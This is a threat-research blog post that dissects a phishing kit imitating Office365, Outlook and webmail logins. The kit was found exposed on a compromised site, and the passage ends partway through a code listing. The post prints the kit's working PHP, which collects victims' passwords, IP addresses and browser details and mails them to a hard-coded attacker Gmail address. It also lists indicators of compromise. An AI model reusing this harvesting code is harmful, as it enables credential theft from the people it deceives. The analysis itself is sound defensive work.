<!DOCTYPE html>
<html lang="en">

    <head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta http-equiv="Content-Language" content="en">

	<meta name="author" content="Andrea Palmieri">
	<meta name="description" content="I started hunting and reporting phishing websites on Twitter: follow me here if you are interested! In this series of posts I am going to analyze and discuss some of the phishing kits found online.
Let&rsquo;s start from the beginning Here is my tweet containing some information about this instance of the kit:
#phishing #onedrive hxxps://www.bonatura.com/ok.co/u/
exf: macdon161@gmail
reg: @GoDaddy 🔐 @letsencrypt ☣️ 63.249.146.86 (AS54489)
🎯 @onedrive @Microsoft @illegalFawn @ActorExpose @PhishKitTracker @Spam404 @malwrhunterteam @JAMESWT_MHT @ANeilan @sysgoblin @PhishStats pic.">
	<meta name="keywords" content="blog, infosec, security, cyber security">

	<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Phishing findings, campaign #1: u.zip (Office365/Outlook)"/>
<meta name="twitter:description" content="I started hunting and reporting phishing websites on Twitter: follow me here if you are interested! In this series of posts I am going to analyze and discuss some of the phishing kits found online.
Let&rsquo;s start from the beginning Here is my tweet containing some information about this instance of the kit:
#phishing #onedrive hxxps://www.bonatura.com/ok.co/u/
exf: macdon161@gmail
reg: @GoDaddy 🔐 @letsencrypt ☣️ 63.249.146.86 (AS54489)
🎯 @onedrive @Microsoft @illegalFawn @ActorExpose @PhishKitTracker @Spam404 @malwrhunterteam @JAMESWT_MHT @ANeilan @sysgoblin @PhishStats pic."/>

	<meta property="og:title" content="Phishing findings, campaign #1: u.zip (Office365/Outlook)" />
<meta property="og:description" content="I started hunting and reporting phishing websites on Twitter: follow me here if you are interested! In this series of posts I am going to analyze and discuss some of the phishing kits found online.
Let&rsquo;s start from the beginning Here is my tweet containing some information about this instance of the kit:
#phishing #onedrive hxxps://www.bonatura.com/ok.co/u/
exf: macdon161@gmail
reg: @GoDaddy 🔐 @letsencrypt ☣️ 63.249.146.86 (AS54489)
🎯 @onedrive @Microsoft @illegalFawn @ActorExpose @PhishKitTracker @Spam404 @malwrhunterteam @JAMESWT_MHT @ANeilan @sysgoblin @PhishStats pic." />
<meta property="og:type" content="article" />
<meta property="og:url" content="/posts/phishing-findings-1/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2020-05-26T00:00:00+00:00" />
<meta property="article:modified_time" content="2020-05-26T00:00:00+00:00" />



	
	<base href="/posts/phishing-findings-1/">
	
	<title>
  Phishing findings, campaign #1: u.zip (Office365/Outlook) · andpalmier
</title>

	
	<link rel="canonical" href="/posts/phishing-findings-1/">
	

	<link href="https://fonts.googleapis.com/css?family=Lato:400,700%7CMerriweather:300,700%7CSource+Code+Pro:400,700&display=swap" rel="stylesheet">
	<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.13.0/css/all.css" integrity="sha384-Bfad6CLCknfcloXFOyFnlgtENryhrpZCe29RTifKEixXQZ38WheV+i/6YWSzkz3V" crossorigin="anonymous">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/8.0.1/normalize.min.css" integrity="sha256-l85OmPOjvil/SOvVt3HnSSjzF1TUMyT9eV0c2BzEGzU=" crossorigin="anonymous" />

	
	
	
	<link rel="stylesheet" href="/css/coder.min.d5c572a4dda2996f45f4bd9e584d43751439ce2134c33701e8d32920cc8e7d92.css" integrity="sha256-1cVypN2imW9F9L2eWE1DdRQ5ziE0wzcB6NMpIMyOfZI=" crossorigin="anonymous" media="screen" />
	

	

	
	
	
	
	<link rel="stylesheet" href="/css/coder-dark.min.58ba09b2c45d36fcfc1a96c8ad83bbbc03a9de4bce8463f3c30a896134febfb3.css" integrity="sha256-WLoJssRdNvz8GpbIrYO7vAOp3kvOhGPzwwqJYTT&#43;v7M=" crossorigin="anonymous" media="screen" />
	
	

	
	<link rel="stylesheet" href="/css/extra-style.css" />
	

	

	<link rel="icon" type="image/png" href="/images/favicon-32x32.png" sizes="32x32">
	<link rel="icon" type="image/png" href="/images/favicon-16x16.png" sizes="16x16">

	

	<meta name="generator" content="Hugo 0.92.2" />
    </head>

    
    
    
    
    <body class="colorscheme-dark"

	  onload=""
	  >
	  
<div class="float-container">
    <a id="dark-mode-toggle" class="colorscheme-toggle">
        <i class="fa fa-adjust fa-fw" aria-hidden="true"></i>
    </a>
</div>


	  <main class="wrapper">
	      <nav class="navigation">
  <section class="container">
    <a class="navigation-title" href="/">
      andpalmier
    </a>
    
    <input type="checkbox" id="menu-toggle" />
    <label class="menu-button float-right" for="menu-toggle"><i class="fas fa-bars"></i></label>
    <ul class="navigation-list">
      
        
          <li class="navigation-item">
            <a class="navigation-link" href="/">Home</a>
          </li>
        
          <li class="navigation-item">
            <a class="navigation-link" href="/about/">About</a>
          </li>
        
      
      
    </ul>
    
  </section>
</nav>


	      <div class="content">
		  
  <section class="container post">
    <article>
      <header>
        <div class="post-title">
          <h1 class="title">Phishing findings, campaign #1: u.zip (Office365/Outlook)</h1>
        </div>
        <div class="post-meta">
          <div class="date">
            <span class="posted-on">
              <i class="fas fa-calendar"></i>
              <time datetime='2020-05-26T00:00:00Z'>
                May 26, 2020
              </time>
            </span>
            <span class="reading-time">
              <i class="fas fa-clock"></i>
              7-minute read
            </span>
          </div>
          <div class="categories">
  <i class="fas fa-folder"></i>
    <a href="/categories/phishing/">phishing</a></div>

          <div class="tags">
  <i class="fas fa-tag"></i>
    <a href="/tags/phishing/">phishing</a>
      <span class="separator">•</span>
    <a href="/tags/phishingkit/">phishingkit</a>
      <span class="separator">•</span>
    <a href="/tags/office365/">office365</a></div>

        </div>
      </header>

      <div>
        
        <figure><img src="/images/posts/phishing-findings/sampei.jpeg"/>
</figure>

<p>I started hunting and reporting phishing websites on Twitter: follow me <a href="https://twitter.com/andpalmier">here</a> if you are interested!
In this series of posts I am going to analyze and discuss some of the phishing kits found online.</p>
<h2 id="lets-start-from-the-beginning">Let&rsquo;s start from the beginning</h2>
<p>Here is my tweet containing some information about this instance of the kit:</p>
<blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/phishing?src=hash&amp;ref_src=twsrc%5Etfw">#phishing</a> <a href="https://twitter.com/hashtag/onedrive?src=hash&amp;ref_src=twsrc%5Etfw">#onedrive</a>  <br>hxxps://www.bonatura.com/ok.co/u/<br><br>exf: macdon161@gmail<br>reg: <a href="https://twitter.com/GoDaddy?ref_src=twsrc%5Etfw">@GoDaddy</a> <br>🔐 <a href="https://twitter.com/letsencrypt?ref_src=twsrc%5Etfw">@letsencrypt</a> <br>☣️ 63.249.146.86 (AS54489)<br>🎯 <a href="https://twitter.com/onedrive?ref_src=twsrc%5Etfw">@onedrive</a> <a href="https://twitter.com/Microsoft?ref_src=twsrc%5Etfw">@Microsoft</a> <br> <a href="https://twitter.com/illegalFawn?ref_src=twsrc%5Etfw">@illegalFawn</a> <a href="https://twitter.com/ActorExpose?ref_src=twsrc%5Etfw">@ActorExpose</a> <a href="https://twitter.com/PhishKitTracker?ref_src=twsrc%5Etfw">@PhishKitTracker</a> <a href="https://twitter.com/Spam404?ref_src=twsrc%5Etfw">@Spam404</a> <a href="https://twitter.com/malwrhunterteam?ref_src=twsrc%5Etfw">@malwrhunterteam</a> <a href="https://twitter.com/JAMESWT_MHT?ref_src=twsrc%5Etfw">@JAMESWT_MHT</a> <a href="https://twitter.com/ANeilan?ref_src=twsrc%5Etfw">@ANeilan</a> <a href="https://twitter.com/sysgoblin?ref_src=twsrc%5Etfw">@sysgoblin</a> <a href="https://twitter.com/PhishStats?ref_src=twsrc%5Etfw">@PhishStats</a> <a href="https://t.co/zbFwmBWEvm">pic.twitter.com/zbFwmBWEvm</a></p>&mdash; Andrea Palmieri🤌 (@andpalmier) <a href="https://twitter.com/andpalmier/status/1263931978954485763?ref_src=twsrc%5Etfw">May 22, 2020</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>

<p>We can clearly see from the second screenshot that the zip containing the phishing kit is left exposed, thus we can download it and check it on VirusTotal using the hash of the zip:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-bash" data-lang="bash">$ sha256sum u.zip
c9079c6f6576da99f979b637c358a45f89c7187ddb80edf9e7fb2d9500880173  u.zip
</code></pre></div><figure><img src="/images/posts/phishing-findings/ep1/vtuzip.png"
         alt="u.zip on VirusTotal"/><figcaption>
            <p><a href="https://www.virustotal.com/gui/file/c9079c6f6576da99f979b637c358a45f89c7187ddb80edf9e7fb2d9500880173/detection">u.zip on VirusTotal</a></p>
        </figcaption>
</figure>

<h2 id="explore-the-kit">Explore the kit</h2>
<p>When extracting the archive, we can see the following structure:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">u
├── aol.php
├── css
│   ├── bootstrap.min.css
│   └── style.css
├── emailcode
│   └── email.php
├── images
│   ├── landing-devices-bg.jpg
│   ├── mail.png
│   ├── microbg.jpg
│   ├── microsoftlogo.png
│   ├── mobile-img.png
│   ├── officebg.jpg
│   ├── officelogo.png
│   ├── office.png
│   ├── Onedrive-logo.png
│   ├── outlook.png
│   └── webmaillogo.png
├── index.php
├── js
│   └── bootstrap.min.js
├── microsoft.php
├── office.php
├── outlookcode
│   └── email.php
└── webmail.php
</code></pre></div><p>I usually start the analysis from the entrypoint: so, in this case, <code>index.php</code>. If we look at the div having the class <code>loginform</code>, we can find an interesting feature of this kit: it gives the user three options to login (Office365, Outlook and &lsquo;other mail&rsquo;).</p>
<p>Here is how it looks in the code and in the browser:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;loginform&#34;</span>&gt;
&lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;office.php&#34;</span>  <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;loginoffice&#34;</span>&gt;Login with Office 365&lt;/<span style="color:#f92672">a</span>&gt;
&lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;microsoft.php&#34;</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;loginoutlook&#34;</span>&gt;Login with Outlook&lt;/<span style="color:#f92672">a</span>&gt;
&lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;webmail.php&#34;</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;loginmail&#34;</span>&gt;Login with Other Mail&lt;/<span style="color:#f92672">a</span>&gt;
&lt;/<span style="color:#f92672">div</span>&gt;
</code></pre></div><figure><img src="/images/posts/phishing-findings/ep1/indexphp.png"
         alt="How this phishing kit looks like when deployed"/><figcaption>
            <p>How this phishing kit looks like when deployed</p>
        </figcaption>
</figure>

<h2 id="exfiltration-method">Exfiltration method</h2>
<p>The three PHP files referenced from <code>index.php</code> all include <code>emailcode/email.php</code> in the <code>action</code> of the form containing input fields for the credentials. Here is the form in one of them, specifically <code>webmail.php</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#f92672">form</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;webmail&#34;</span> <span style="color:#a6e22e">methed</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;post&#34;</span> <span style="color:#a6e22e">action</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;emailcode/email.php&#34;</span>&gt;
   &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;form-group orangeclr&#34;</span>&gt;
       &lt;<span style="color:#f92672">label</span> <span style="color:#a6e22e">for</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>&gt;Email Address&lt;/<span style="color:#f92672">label</span>&gt;
       &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;input-group mb-2 mr-sm-2 mb-sm-0&#34;</span>&gt;
           &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;input-group-addon&#34;</span> <span style="color:#a6e22e">style</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;width: 2.6rem&#34;</span>&gt;&lt;<span style="color:#f92672">i</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;fa fa-at&#34;</span>&gt;&lt;/<span style="color:#f92672">i</span>&gt;&lt;/<span style="color:#f92672">div</span>&gt;
           &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;form-control&#34;</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;email&#34;</span>
                    <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;you@example.com&#34;</span> <span style="color:#a6e22e">required</span> <span style="color:#a6e22e">autofocus</span>&gt;
       &lt;/<span style="color:#f92672">div</span>&gt;
   &lt;/<span style="color:#f92672">div</span>&gt;
   &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;form-group orangeclr&#34;</span>&gt;
       &lt;<span style="color:#f92672">label</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span> <span style="color:#a6e22e">for</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;password&#34;</span>&gt;Password&lt;/<span style="color:#f92672">label</span>&gt;
       &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;input-group mb-2 mr-sm-2 mb-sm-0&#34;</span>&gt;
           &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;input-group-addon&#34;</span> <span style="color:#a6e22e">style</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;width: 2.6rem&#34;</span>&gt;&lt;<span style="color:#f92672">i</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;fa fa-key&#34;</span>&gt;&lt;/<span style="color:#f92672">i</span>&gt;&lt;/<span style="color:#f92672">div</span>&gt;
           &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;password&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;password&#34;</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;form-control&#34;</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;password&#34;</span>
                  <span style="color:#a6e22e">placeholder</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Password&#34;</span> <span style="color:#a6e22e">required</span>&gt;
       &lt;/<span style="color:#f92672">div</span>&gt;
   &lt;/<span style="color:#f92672">div</span>&gt;
   &lt;<span style="color:#f92672">div</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;gostepbtn&#34;</span>&gt;
       &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;submit&#34;</span> <span style="color:#a6e22e">name</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;submit_btn&#34;</span> <span style="color:#a6e22e">value</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;Go to step 2&#34;</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;gostep&#34;</span> /&gt;
   &lt;/<span style="color:#f92672">div</span>&gt;
&lt;/<span style="color:#f92672">form</span>&gt;
</code></pre></div><p>After the victim enters the credentials, these are sent to <code>emailcode/email.php</code> with a POST. Let&rsquo;s check what happens in there:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-php" data-lang="php"><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
<span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">isset</span>($_REQUEST[<span style="color:#e6db74">&#39;submit_btn&#39;</span>])){
    $admin_email <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;macdon161@gmail.com&#34;</span>;
    $email <span style="color:#f92672">=</span> $_REQUEST[<span style="color:#e6db74">&#39;email&#39;</span>];
    $password <span style="color:#f92672">=</span> $_REQUEST[<span style="color:#e6db74">&#39;password&#39;</span>];
    $ip <span style="color:#f92672">=</span> <span style="color:#a6e22e">getenv</span>(<span style="color:#e6db74">&#34;REMOTE_ADDR&#34;</span>);
    $country <span style="color:#f92672">=</span> <span style="color:#a6e22e">ip_visitor_country</span>();
    $region <span style="color:#f92672">=</span> <span style="color:#a6e22e">ip_visitor_region</span>();
    $city <span style="color:#f92672">=</span> <span style="color:#a6e22e">ip_visitor_city</span>();
    $adddate <span style="color:#f92672">=</span> <span style="color:#a6e22e">date</span>(<span style="color:#e6db74">&#34;D M d, Y g:i a&#34;</span>);
    $browser <span style="color:#f92672">=</span> $_SERVER[<span style="color:#e6db74">&#39;HTTP_USER_AGENT&#39;</span>];
</code></pre></div><p><code>admin_email</code> contains the exfiltration email address for this instance of the phishing kit. So we can confirm that information is sent directly via email to the address specified in the variable.</p>
<p>As it is possible to see in the code above, the email sent includes multiple information: credentials, IP address, date and User-Agent string. The kit also tries to obtain the country, region and city where the request was generated by performing a request to <em>geoplugin.net</em> with <code>curl_init</code> and providing the IP address. However - as of now - the service has moved to <em>geoplugin.com</em>, thus these information cannot currently be collected by the kit.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-php" data-lang="php"><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
<span style="color:#75715e">// Always set content-type when sending HTML email
</span><span style="color:#75715e"></span>$formname <span style="color:#f92672">=</span> $_REQUEST[<span style="color:#e6db74">&#39;logintype&#39;</span>];
<span style="color:#66d9ef">switch</span> ($formname) {
    <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#34;office&#34;</span><span style="color:#f92672">:</span>
        $message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Login Type Selection -- Office </span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
        $subject <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Office login attempt -- &#34;</span><span style="color:#f92672">.</span>$ip;
        <span style="color:#66d9ef">break</span>;
    <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#34;outlook&#34;</span><span style="color:#f92672">:</span>
        $message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Login Type Selection -- Outlook </span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
        $subject <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Outlook login attempt -- &#34;</span><span style="color:#f92672">.</span>$ip;
        <span style="color:#66d9ef">break</span>;
    <span style="color:#66d9ef">case</span> <span style="color:#e6db74">&#34;webmail&#34;</span><span style="color:#f92672">:</span>
        $message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Login Type Selection -- Webmail </span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
        $subject <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Webmail login attempt -- &#34;</span><span style="color:#f92672">.</span>$ip;
        <span style="color:#66d9ef">break</span>;
    <span style="color:#66d9ef">default</span><span style="color:#f92672">:</span>
        $message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Login Type Selection -- other </span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
        $subject <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;other login attempt -- &#34;</span><span style="color:#f92672">.</span>$ip;
}
</code></pre></div><p>Using a switch, the kit detects which type of credentials were submitted by the phished user, and it changes the message and the subject of the email accordingly.</p>
<p>In the rest of the code the headers and body of the email are set, then the email is sent using <code>mail()</code>. After that, the user is redirected to a login page of Microsoft: <em><a href="https://login.microsoftonline.com/common/oauth2">https://login.microsoftonline.com/common/oauth2</a></em>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-php" data-lang="php"><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
$from <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;Outlook &lt;noreply&gt;&#39;</span>;
<span style="color:#75715e">// To send HTML mail, the Content-type header must be set
</span><span style="color:#75715e"></span>$headers  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;MIME-Version: 1.0&#39;</span> <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
$headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#39;Content-type: text/html; charset=iso-8859-1&#39;</span> <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
<span style="color:#75715e">// Create email headers
</span><span style="color:#75715e"></span>$headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#39;From: &#39;</span><span style="color:#f92672">.</span>$from<span style="color:#f92672">.</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span><span style="color:#f92672">.</span>
    <span style="color:#e6db74">&#39;Reply-To: &#39;</span><span style="color:#f92672">.</span>$from<span style="color:#f92672">.</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">.</span>
    <span style="color:#e6db74">&#39;X-Mailer: PHP/&#39;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">phpversion</span>();
$headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;MIME-Version: 1.0&#34;</span> <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
$headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Content-Type: text/html; charset=ISO-8859-1</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
<span style="color:#75715e">// More headers
</span><span style="color:#75715e"></span>$headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Reply-To: &#34;</span><span style="color:#f92672">.</span> <span style="color:#a6e22e">strip_tags</span>($email) <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
$message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Username/Email -- </span><span style="color:#e6db74">$email\n</span><span style="color:#e6db74">&#34;</span>;
$message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Password -- </span><span style="color:#e6db74">$password\n</span><span style="color:#e6db74">&#34;</span>;
$message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;IP --  &#34;</span><span style="color:#f92672">.</span>$ip<span style="color:#f92672">.</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
$message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Country Detected --  &#34;</span><span style="color:#f92672">.</span>$country<span style="color:#f92672">.</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
$message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Region Detected --  &#34;</span><span style="color:#f92672">.</span>$region<span style="color:#f92672">.</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
$message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;City Detected --  &#34;</span><span style="color:#f92672">.</span>$city<span style="color:#f92672">.</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
$message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Date --  &#34;</span><span style="color:#f92672">.</span>$adddate<span style="color:#f92672">.</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
$message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Browser Detected --  &#34;</span><span style="color:#f92672">.</span>$browser<span style="color:#f92672">.</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>;
  <span style="color:#75715e">//send email
</span><span style="color:#75715e"></span><span style="color:#f92672">@</span><span style="color:#a6e22e">mail</span>($admin_email,$subject,$message);
<span style="color:#a6e22e">header</span>(<span style="color:#e6db74">&#39;Location: https://login.microsoftonline.com/common/oauth2&#39;</span>);
</code></pre></div><h2 id="other-php-files">Other php files</h2>
<p>At this point, the workflow of the kit seems clear, however there are two php files that seem unrelated with the rest of the kit, because they are never called or included: <code>outlookcode/email.php</code> and <code>aol.php</code>.</p>
<h3 id="outlookcodeemailphp">outlookcode/email.php</h3>
<p>This file seems to have the same purpose of <code>emailcode/email.php</code>, but is less sophisticated, as it does not contain the switch case to handle multiple phishing pages. Here is the code:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-php" data-lang="php"><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
<span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">isset</span>($_REQUEST[<span style="color:#e6db74">&#39;submit_btn&#39;</span>])){
    $admin_email <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;macdon161@gmail.com&#34;</span>;
    $email <span style="color:#f92672">=</span> $_REQUEST[<span style="color:#e6db74">&#39;email&#39;</span>];
    $password <span style="color:#f92672">=</span> $_REQUEST[<span style="color:#e6db74">&#39;password&#39;</span>];
      <span style="color:#75715e">// $headers = &#34;From:&#34;.$email;
</span><span style="color:#75715e"></span>
      <span style="color:#75715e">// Always set content-type when sending HTML email
</span><span style="color:#75715e"></span>    $headers <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;MIME-Version: 1.0&#34;</span> <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
    $headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Content-type:text/html;charset=UTF-8&#34;</span> <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;

    <span style="color:#75715e">// More headers
</span><span style="color:#75715e"></span>    $headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#39;From:&#39;</span><span style="color:#f92672">.</span>$email <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;


    $subject <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;Recived data&#39;</span><span style="color:#f92672">.</span>$email;

    $headers <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;From: &#34;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">strip_tags</span>($email) <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
    $headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Reply-To: &#34;</span><span style="color:#f92672">.</span> <span style="color:#a6e22e">strip_tags</span>($email) <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
    $headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;MIME-Version: 1.0</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
    $headers <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;Content-Type: text/html; charset=ISO-8859-1</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;

    $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&lt;html&gt;&lt;body&gt;&#39;</span>;
    $message <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#39;&lt;p&gt;Username: &#39;</span><span style="color:#f92672">.</span>$email<span style="color:#f92672">.</span><span style="color:#e6db74">&#39;&lt;p&gt;&lt;br&gt;&#39;</span>;
